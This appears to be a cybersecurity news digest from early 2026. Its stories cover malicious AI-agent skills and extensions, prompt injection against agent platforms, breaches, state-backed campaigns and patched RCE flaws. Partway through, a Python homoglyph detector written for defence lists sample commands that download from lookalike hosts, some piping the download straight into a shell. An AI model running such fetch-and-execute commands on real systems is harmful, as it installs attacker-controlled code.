Microsoft is addressing a bug in its anti-spam service that incorrectly blocks URLs in Exchange Online and Microsoft Teams, causing some emails to be quarantined. The issue began on September 5, 2025, affecting users who received false alerts about malicious URLs. Over 6,000 URLs have been identified as affected, and Microsoft is working to unblock them and recover any incorrectly flagged messages. The bug is due to the anti-spam engine mistakenly tagging URLs within other URLs as potentially malicious. Microsoft has deployed a partial fix and is continuing to address the impact. The incident has been classified as an event with noticeable user impact, although the exact number of affected customers and regions remains undisclosed. In a new development, on February 5, 2026, another incident began where Exchange Online mistakenly flags legitimate emails as phishing and quarantines them. This issue is caused by a new URL rule that incorrectly flags some URLs as malicious. Microsoft is working to release quarantined emails and confirm that legitimate URLs are unblocked. Similar issues have occurred throughout the year, including a May 2025 incident where a machine learning model incorrectly flagged Gmail emails as spam in Exchange Online.

Social Media Platforms Generate Billions from Scam Ads in Europe

Updated: · First: 09.02.2026 12:30 · 📰 1 src / 1 articles

Social media platforms earned nearly £3.8bn ($5.2bn) from malicious ads in Europe in 2025, with 993 billion ad impressions linked to scams. The report by Juniper Research highlights the need for better detection, enforcement, and user education to combat scam ads and maintain user trust. The report predicts a surge to 1.4 trillion impressions by 2030, potentially increasing revenue from scam ads to £8.4bn unless more protections are implemented.

European Commission Investigates Breach in Mobile Device Management Platform

Updated: · First: 09.02.2026 11:49 · 📰 1 src / 1 articles

The European Commission is investigating a breach in its mobile device management platform, which may have exposed staff personal information. The attack was detected on January 30, 2026, and contained within 9 hours. The breach is linked to vulnerabilities in Ivanti Endpoint Manager Mobile (EPMM) software, similar to recent attacks on Dutch institutions. The compromised data includes names, phone numbers, and business email addresses of staff members. The Commission's response included cleaning the system, but no compromise of mobile devices was detected. The incident follows the Commission's proposal of new cybersecurity legislation to strengthen defenses against state-backed and cybercrime groups.

Malicious OpenClaw AI Coding Assistant Extension on VS Code Marketplace

Updated: 09.02.2026 11:30 · First: 28.01.2026 19:46 · 📰 5 src / 8 articles

A malicious Microsoft Visual Studio Code (VS Code) extension named "ClawdBot Agent - AI Coding Assistant" was discovered on the official Extension Marketplace. The extension, which posed as a free AI coding assistant, stealthily dropped a malicious payload on compromised hosts. The extension was taken down by Microsoft after being reported by cybersecurity researchers. The malicious extension executed a binary named "Code.exe" that deployed a legitimate remote desktop program, granting attackers persistent remote access to compromised hosts. The extension also incorporated multiple fallback mechanisms to ensure payload delivery, including retrieving a DLL from Dropbox and using hard-coded URLs to obtain the payloads. Additionally, security researchers found hundreds of unauthenticated Moltbot instances online, exposing sensitive data and credentials. Moltbot, an open-source personal AI assistant, can run 24/7 locally, maintaining a persistent memory and executing scheduled tasks. However, insecure deployments can lead to sensitive data leaks, corporate data exposure, credential theft, and command execution. Hundreds of Clawdbot Control admin interfaces are exposed online due to reverse proxy misconfiguration, allowing unauthenticated access and root-level system access. More than 230 malicious packages for OpenClaw (formerly Moltbot and ClawdBot) have been published in less than a week on the tool's official registry and on GitHub. These malicious skills impersonate legitimate utilities and inject information-stealing malware payloads onto users' systems, targeting sensitive data like API keys, wallet private keys, SSH credentials, and browser passwords. Users are advised to audit their configurations, revoke connected service integrations, and implement network controls to mitigate potential risks. A self-styled social networking platform built for AI agents, Moltbook, contained a misconfigured database that allowed full read and write access to all data. 
The exposure was due to a Supabase API key exposed in client-side JavaScript, granting unauthenticated access to the entire production database. Researchers accessed 1.5 million API authentication tokens, 30,000 email addresses, and thousands of private messages between agents. The API key exposure allowed attackers to impersonate any agent on the platform, post content, send messages, and interact as that agent. Unauthenticated users could edit existing posts, inject malicious content or prompt injection payloads, and deface the site. SecurityScorecard found 40,214 exposed OpenClaw instances associated with 28,663 unique IP addresses. 63% of observed deployments are vulnerable, with 12,812 instances exploitable via remote code execution (RCE) attacks. SecurityScorecard correlated 549 instances with prior breach activity and 1493 with known vulnerabilities. Three high-severity CVEs in OpenClaw have been discovered, with public exploit code available. OpenClaw instances are at risk of indirect prompt injection and API key leaks, with most exposures located in China, the US, and Singapore.

CISA Mandates Replacement of End-of-Life Edge Devices in Federal Networks

Updated: 09.02.2026 11:00 · First: 06.02.2026 10:41 · 📰 4 src / 4 articles

The U.S. Cybersecurity and Infrastructure Security Agency (CISA), in collaboration with the FBI and the UK's National Cyber Security Centre (NCSC), has issued a joint alert warning about the risks posed by discontinued edge devices. These devices, which include firewalls, IoT devices, load balancers, network security appliances, routers, switches, wireless access points, and other software and hardware appliances, are often targeted by state-sponsored threat actors for network access, persistence, and data theft. CISA has issued Binding Operational Directive 26-02, mandating federal agencies to decommission and replace end-of-life (EOL) edge devices within 12 to 18 months. Agencies must also establish continuous discovery processes to identify and manage devices approaching end-of-support (EOS) status within 24 months. CISA has developed an end-of-support edge device list to assist agencies in this effort. On February 5, 2026, CISA issued BOD 26-02, emphasizing the immediate actions required by federal agencies, including updating supported edge devices running EOS software within three months and decommissioning identified EOS edge devices within 18 months.

TeamPCP Worm Exploits Cloud Infrastructure for Criminal Operations

Updated: · First: 09.02.2026 10:37 · 📰 1 src / 1 articles

TeamPCP, a threat cluster active since November 2025, has conducted a worm-driven campaign targeting cloud-native environments to build malicious infrastructure. The campaign, observed around December 25, 2025, leveraged exposed Docker APIs, Kubernetes clusters, Ray dashboards, Redis servers, and the React2Shell vulnerability (CVE-2025-55182) to compromise servers for data exfiltration, ransomware deployment, extortion, and cryptocurrency mining. The group operates as a cloud-native cybercrime platform, using misconfigured cloud services and known vulnerabilities to create a self-propagating criminal ecosystem. TeamPCP's activities include deploying various payloads such as proxy.sh, scanner.py, kube.py, react.py, and pcpcat.py to exploit and expand their reach within cloud environments. The group's operations are opportunistic, targeting AWS and Microsoft Azure environments, and have resulted in data leaks and extortion activities.

Tirith Tool Detects and Blocks Homoglyph Attacks in Command-Line Environments

Updated: · First: 08.02.2026 17:26 · 📰 1 src / 1 articles

A new open-source tool called Tirith has been released to detect and block homoglyph attacks in command-line environments. The tool analyzes URLs in typed commands to prevent execution of deceptive attacks that use lookalike characters from different alphabets. Tirith supports multiple shells and operating systems, providing real-time protection against various types of terminal-based attacks.
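The check described above, as an added example in the spirit of Tirith (not Tirith's own code): it extracts URLs from a command line, decodes punycode labels, and flags hosts whose labels mix scripts or consist entirely of Latin lookalikes. The confusables table is a small constructed subset of the Unicode confusables data, and the sample commands and their lookalike hosts are constructed stand-ins.

```python
"""Flag homoglyph (lookalike-character) hostnames in URLs typed on a command line.
Added example in the spirit of Tirith; it is not Tirith's code. CONFUSABLES is a
small constructed subset of the Unicode confusables data."""
import re
import unicodedata
from urllib.parse import urlsplit

URL_RE = re.compile(r"https?://[^\s'\"|;&<>]+")

# Constructed subset: non-Latin letters that render almost identically to Latin letters.
CONFUSABLES = {
    "\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c",
    "\u0443": "y", "\u0445": "x", "\u04cf": "l", "\u0456": "i", "\u0458": "j",
    "\u03b1": "a", "\u03bd": "v", "\u03bf": "o",
}
# Severity order used to pick the worst label of a host.
RANK = {"ascii": 0, "idn": 1, "confusable": 2, "mixed-script": 3}


def script_of(ch: str) -> str:
    """Script taken from the Unicode character name ('LATIN', 'CYRILLIC', ...); '' for non-letters."""
    if not ch.isalpha():
        return ""
    return unicodedata.name(ch, "").split(" ")[0]


def decode_label(label: str) -> str:
    """Undo punycode (xn--) so an ACE-encoded lookalike is inspected in its Unicode form."""
    if label.lower().startswith("xn--"):
        try:
            return label[4:].encode("ascii").decode("punycode")
        except UnicodeError:
            return label
    return label


def classify_label(label: str) -> tuple:
    """Return (verdict, skeleton); the skeleton replaces confusables with their Latin twins."""
    text = decode_label(label)
    if text.isascii():
        # Plain ASCII, or a punycode label that could not be decoded (kept for review).
        return ("idn" if label.lower().startswith("xn--") else "ascii", text)
    skeleton = "".join(CONFUSABLES.get(c, c) for c in text)
    scripts = {script_of(c) for c in text} - {""}
    if len(scripts) > 1:
        return ("mixed-script", skeleton)   # e.g. Latin 'paypal' with one Cyrillic 'a'
    if skeleton.isascii():
        return ("confusable", skeleton)     # whole label reads as a Latin word
    return ("idn", skeleton)                # genuine non-Latin domain: review, not block


def analyze_command(cmd: str) -> list:
    """Inspect every URL in a command line and return one finding per URL."""
    findings = []
    for url in URL_RE.findall(cmd):
        host = urlsplit(url).hostname or ""
        worst, parts = "ascii", []
        for label in host.split("."):
            verdict, skeleton = classify_label(label)
            parts.append(skeleton)
            if RANK[verdict] > RANK[worst]:
                worst = verdict
        findings.append({"url": url, "host": host, "verdict": worst,
                         "looks_like": ".".join(parts)})
    return findings


def should_block(cmd: str) -> bool:
    """Block when any URL host is a lookalike: mixed-script or whole-script confusable."""
    return any(f["verdict"] in ("confusable", "mixed-script") for f in analyze_command(cmd))


# Constructed sample commands; the lookalike hosts are stand-ins, not real indicators.
SAMPLE_COMMANDS = [
    "curl -fsSL https://example.com/install.sh | sh",
    "curl -fsSL https://\u0430\u0440\u0440\u04cf\u0435.com/setup.sh | sh",  # Cyrillic 'apple'
    "wget http://xn--80ak6aa92e.com/pkg.tar.gz",                          # same host, punycode
    "pip install --index-url https://payp\u0430l.com/simple demo",        # one Cyrillic 'a'
]

if __name__ == "__main__":
    for cmd in SAMPLE_COMMANDS:
        for f in analyze_command(cmd):
            print(f"{f['verdict']:13} {f['host']} -> looks like {f['looks_like']}")
        print("BLOCK" if should_block(cmd) else "allow", cmd)
```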

341 Malicious ClawHub Skills Target OpenClaw Users with Atomic Stealer

Updated: 08.02.2026 09:32 · First: 02.02.2026 19:49 · 📰 3 src / 5 articles

A security audit by Koi Security identified 341 malicious skills on ClawHub, a marketplace for OpenClaw users, which distribute Atomic Stealer malware to steal sensitive data from macOS and Windows systems. The campaign, codenamed ClawHavoc, uses social engineering tactics to trick users into installing malicious prerequisites. The skills masquerade as legitimate tools, including cryptocurrency utilities, YouTube tools, and finance applications. OpenClaw has added a reporting feature and partnered with VirusTotal to scan skills uploaded to ClawHub, providing an additional layer of security for the OpenClaw community. The malware targets API keys, credentials, and other sensitive data, exploiting the open-source ecosystem's vulnerabilities. The campaign coincides with a report from OpenSourceMalware, highlighting the same threat. The intersection of AI agent capabilities and persistent memory amplifies the risks, enabling stateful, delayed-execution attacks. New findings reveal almost 400 fake crypto trading add-ons in the project behind the viral Moltbot/OpenClaw AI assistant tool can lead users to install information-stealing malware. These add-ons, called skills, masquerade as cryptocurrency trading automation tools and target ByBit, Polymarket, Axiom, Reddit, and LinkedIn. The malicious skills share the same command-and-control (C2) infrastructure, 91.92.242.30, and use sophisticated social engineering to convince users to execute malicious commands which then steal crypto assets like exchange API keys, wallet private keys, SSH credentials, and browser passwords.

Asian State-Backed Group TGR-STA-1030 Targets 70 Government and Infrastructure Entities

Updated: 07.02.2026 17:09 · First: 06.02.2026 14:07 · 📰 2 src / 3 articles

A previously undocumented cyber espionage group, TGR-STA-1030, has compromised at least 70 government and critical infrastructure organizations across 37 countries over the past year. The group, assessed to be of Asian origin, leverages phishing emails and exploits N-day vulnerabilities to deploy malware and maintain long-term access for espionage purposes. Targets include national law enforcement, ministries of finance, and departments related to economic, trade, natural resources, and diplomatic functions. The group uses a variety of tools, including Cobalt Strike, Behinder, Godzilla, and a Linux kernel rootkit named ShadowGuard. The group conducted reconnaissance activity targeting government entities connected to 155 countries between November and December 2025 and showed increased interest in scanning entities across North, Central, and South America during the U.S. government shutdown in October 2025. The group also exploited at least 15 known vulnerabilities in SAP Solution Manager, Microsoft Exchange Server, D-Link, and Microsoft Windows.

Active Spyware Campaigns Targeting High-Value Signal and WhatsApp Users

Updated: 07.02.2026 13:15 · First: 25.11.2025 08:42 · 📰 4 src / 7 articles

Germany's Federal Office for the Protection of the Constitution (BfV) and Federal Office for Information Security (BSI) have issued a joint advisory warning of a malicious cyber campaign undertaken by a likely state-sponsored threat actor that involves carrying out phishing attacks over the Signal messaging app. The focus is on high-ranking targets in politics, the military, and diplomacy, as well as investigative journalists in Germany and Europe. Unauthorized access to messenger accounts not only allows access to confidential private communications but also potentially compromises entire networks. The campaign involves threat actors masquerading as 'Signal Support' or a support chatbot named 'Signal Security ChatBot' to initiate direct contact with prospective targets, urging them to provide a PIN or verification code received via SMS, or risk facing data loss. Should the victim comply, the attackers can register the account and gain access to the victim's profile, settings, contacts, and block list through a device and mobile phone number under their control. There also exists an alternative infection sequence that takes advantage of the device linking option to trick victims into scanning a QR code, thereby granting the attackers access to the victim's account, including their messages for the last 45 days, on a device managed by them. The security authorities warned that while the current focus of the campaign appears to be Signal, the attack can also be extended to WhatsApp since it also incorporates similar device linking and PIN features as part of two-step verification. Similar attacks have been orchestrated by multiple Russia-aligned threat clusters tracked as Star Blizzard, UNC5792 (aka UAC-0195), and UNC4221 (aka UAC-0185).

China-Linked DKnife AitM Framework Targets Routers for Traffic Hijacking and Malware Delivery

Updated: 06.02.2026 20:35 · First: 06.02.2026 16:56 · 📰 3 src / 5 articles

Cybersecurity researchers have uncovered a China-linked adversary-in-the-middle (AitM) framework called DKnife, active since at least 2019. The framework targets routers and edge devices to perform deep packet inspection, manipulate traffic, and deliver malware. It primarily targets Chinese-speaking users by harvesting credentials and delivering malware via popular Chinese services and applications. DKnife comprises seven Linux-based implants that enable a wide range of malicious activities, including DNS hijacking, binary download hijacking, and real-time user activity monitoring. The framework is linked to the Earth Minotaur threat activity cluster and shares infrastructural connections with WizardNet, a Windows implant deployed by TheWizards APT group. DKnife's infrastructure overlaps with a campaign delivering WizardNet, suggesting a shared development or operational lineage. The framework uses a component called yitiji.bin to create a bridged TAP interface on the router at the private IP address 10.3.3.3, allowing the threat actor to intercept and rewrite network packets in transit to the intended host. Additionally, DKnife monitors WeChat activity in detail, tracking voice and video calls, text messages, images sent and received, and articles read on the platform.

Critical Unauthenticated RCE Flaw in SmarterMail Patched

Updated: 06.02.2026 19:16 · First: 30.01.2026 09:09 · 📰 2 src / 3 articles

SmarterTools has addressed a critical unauthenticated remote code execution (RCE) flaw in SmarterMail email software, tracked as CVE-2026-24423 with a CVSS score of 9.3. The vulnerability allows attackers to execute arbitrary OS commands by pointing SmarterMail to a malicious HTTP server. The flaw was discovered by researchers from watchTowr, CODE WHITE GmbH, and VulnCheck and was patched in version Build 9511, released on January 15, 2026. CISA has added CVE-2026-24423 to its KEV catalog, marking it as actively exploited in ransomware campaigns, and has given federal agencies until February 26, 2026, to patch or stop using affected versions. Additionally, another critical flaw (CVE-2026-23760) and a medium-severity vulnerability (CVE-2026-25067) were also addressed in subsequent updates.

EFF Launches 'Encrypt It Already' Campaign for Big Tech E2EE Adoption

Updated: · First: 06.02.2026 18:34 · 📰 1 src / 1 articles

The Electronic Frontier Foundation (EFF) has launched the 'Encrypt It Already' campaign urging major technology and communications companies to prioritize end-to-end encryption (E2EE) for user data and communications. The initiative focuses on three key areas: releasing promised E2EE features, enabling them by default, and launching data protection capabilities already available from competitors. The campaign highlights companies like Bluesky, Ring, and Google for their delayed or optional E2EE implementations. The EFF emphasizes the importance of E2EE in protecting user privacy from third-party access, including law enforcement and government agencies. The campaign also addresses the growing privacy concerns exacerbated by the rise of artificial intelligence (AI) and its potential for misuse. The EFF aims to hold companies accountable for their privacy promises and empower users to control their data.

Substack Data Breach Exposes User Email Addresses and Phone Numbers

Updated: 06.02.2026 18:22 · First: 05.02.2026 14:54 · 📰 2 src / 2 articles

Substack has confirmed a data breach that occurred in October 2025, during which attackers stole email addresses and phone numbers. The breach was detected on February 3, 2026, and confirmed via an email notification to users on February 5, 2026. Substack assured users that no credentials or financial information were accessed. A threat actor later leaked a database containing 697,313 records on BreachForums, claiming the data was scraped. Substack has patched the vulnerability and warned users about potential phishing attempts. Substack has a history of privacy incidents, including a 2020 email exposure. The platform has grown significantly since its launch in 2017, reaching over 50 million active subscriptions, including five million paid, by March 2025.

Browser Attacks Evade Traditional Security Measures

Updated: · First: 06.02.2026 17:01 · 📰 1 src / 1 articles

Modern enterprise work heavily relies on browsers for accessing SaaS applications, identity providers, and AI tools. However, traditional security architectures focus on endpoints, networks, and email, leaving a significant visibility gap in browser activities. This gap allows a class of browser-only attacks to evade detection and investigation, posing a growing challenge for security teams. In 2026, browser attacks continue to leave little traditional evidence, making them difficult to detect and mitigate. These attacks include ClickFix and UI-driven social engineering, malicious extensions, man-in-the-browser attacks, and HTML smuggling. Each of these attack types exploits the lack of visibility into browser activities, making them hard to prevent and investigate. The gap in browser-level observability is widening due to the increasing use of AI tools and AI-native browsers, which normalize actions like copying, pasting, and uploading sensitive information. This makes it even more challenging for security teams to evaluate risks and set effective controls.

EU Fines TikTok for Addictive Design Violating Digital Services Act

Updated: · First: 06.02.2026 15:53 · 📰 1 src / 1 articles

The European Commission is imposing a fine on TikTok for violating the Digital Services Act (DSA) due to its addictive design features, including infinite scroll, autoplay, and personalized recommendations. The commission found that TikTok failed to assess the potential harm to users' physical and mental well-being, particularly minors and vulnerable adults. The fine could reach up to 6% of TikTok's global annual turnover if the findings are confirmed. TikTok is required to modify its core service design to include screen time breaks and disable addictive features.

KEV Collider Tool Enhances Vulnerability Triage for Security Teams

Updated: · First: 06.02.2026 14:53 · 📰 1 src / 1 articles

A new tool called KEV Collider has been developed to help security teams better triage the Known Exploited Vulnerabilities (KEV) Catalog maintained by the US Cybersecurity and Infrastructure Security Agency (CISA). The tool allows teams to filter vulnerabilities based on various criteria, making the list more relevant to their environments. The KEV Catalog, while useful, does not always align with the cybersecurity priorities of most organizations, often including vulnerabilities that are low-severity or low-probability for many companies. KEV Collider integrates data from the KEV Catalog with other sources like CVSS scores, EPSS scores, and Metasploit exploit availability to provide a more comprehensive view. The tool aims to help security teams make better decisions about which vulnerabilities to prioritize, especially as the number of vulnerabilities continues to grow. The creator, Tod Beardsley, emphasizes that the KEV Catalog should not be treated as a must-patch list for all organizations, as it is primarily tailored to the needs of the federal civilian executive branch.